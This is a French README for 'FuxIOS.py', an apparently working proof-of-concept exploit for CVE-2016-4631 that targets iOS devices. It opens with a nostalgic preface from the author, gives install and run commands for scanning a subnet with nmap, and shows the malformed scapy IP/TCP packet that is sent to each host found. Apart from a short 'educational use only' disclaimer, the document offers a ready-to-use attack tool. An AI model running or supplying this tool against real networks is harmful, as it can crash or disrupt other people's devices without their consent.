
PoC d'exploit modernisé en Python 3 pour CVE-2016-4631 ciblant les appareils iOS. Comprend le scan réseau, la génération de charge utile IP/TCP malformée et l'injection de paquets pour des tests de sécurité autorisés et à des fins éducatives.
Pourquoi je publie ceci maintenant ?
En fouillant dans de vieux disques durs et des dépôts oubliés, je suis tombé sur ce script que j'avais écrit il y a des années, au tout début de ma carrière en cybersécurité. C'était une époque différente – Python 2.7 régnait, des vulnérabilités comme CVE-2016-4631 étaient monnaie courante, et chaque PoC qui fonctionnait était une petite victoire.
En voyant ce code après tout ce temps, je n'ai pu m'empêcher de ressentir une certaine nostalgie. Je me suis souvenu de ces nuits passées à déboguer des exploits, l'excitation de voir "Payload sent successfully", et comment chaque script était une étape de plus dans mon apprentissage. Aujourd'hui, je travaille avec des technologies bien plus avancées, mais ce petit script représente ces premiers pas dans le monde de la sécurité offensive.
J'ai décidé de le moderniser et de le publier, non seulement par nostalgie, mais aussi parce que je pense qu'il peut être utile à d'autres qui débutent leur chemin en cybersécurité. C'est un rappel que nous commençons tous quelque part, et que ces premiers scripts « simples » sont la base de tout ce qui vient après.
F0LloW_Th3_R4ts était ma signature à l'époque… certains codes ne s'oublient jamais. 🐀
- BONKERS, Juillet 2025
FuxIOS.py est un Proof of Concept (PoC) mis à jour pour la vulnérabilité CVE-2016-4631 qui affecte les appareils iOS. Cette version a été entièrement réécrite et modernisée pour Python 3 avec des améliorations significatives en termes de fonctionnalité, sécurité et convivialité.
list_of_ips → list_ips# Installer nmap (requis par python-nmap)
# Windows : Télécharger depuis https://nmap.org/download.html
# Linux : sudo apt-get install nmap
# macOS : brew install nmap
# Cloner le dépôt
git clone <repo-url>
cd FuxiOS
# Installer les dépendances
pip install -r requirements.txt
# Ou manuellement :
pip install scapy python-nmap
# Utilisation de base
sudo python3 FuxIOS.py
# Configuration personnalisée
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24
# Options avancées
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24 -m 50 -d 0.1
# Voir l'aide
python3 FuxIOS.py -h
sudo python3 FuxIOS.py --interactive
-s, --source : IP source de l'attaque (par défaut : 192.168.1.95)-n, --network : Sous-réseau cible (par défaut : 192.168.1.0/24)-m, --max-payload : Taille maximale de la charge utile (par défaut : 40)-d, --delay : Délai entre les paquets en secondes (par défaut : 0.2)--interactive : Mode interactif pour la compatibilité# Paquet malveillant
IP(src=source_ip, dst=target_ip, options=malformed_payload) /
TCP(dport=80, flags="S", options=[(19, b"x"*18), (19, b"x"*18)])
Cet outil doit être utilisé exclusivement pour :
Les logs sont sauvegardés dans fuxios_exploit.log et incluent :
Erreur : "No module named 'scapy'"
pip install scapy
Erreur : "No module named 'nmap'"
pip install python-nmap
# Et assurez-vous d'avoir nmap installé sur le système
Erreur : "Permission denied"
# Linux/macOS
sudo python3 FuxIOS.py
# Windows
# Exécuter PowerShell/CMD en tant qu'administrateur
Windows : "WinPcap/Npcap not found"
Ce projet est uniquement à des fins éducatives. L'auteur n'est pas responsable de l'utilisation abusive de cet outil.
Souviens-toi : "F0LloW_Th3_R4ts <:8)~~ <:8)~~"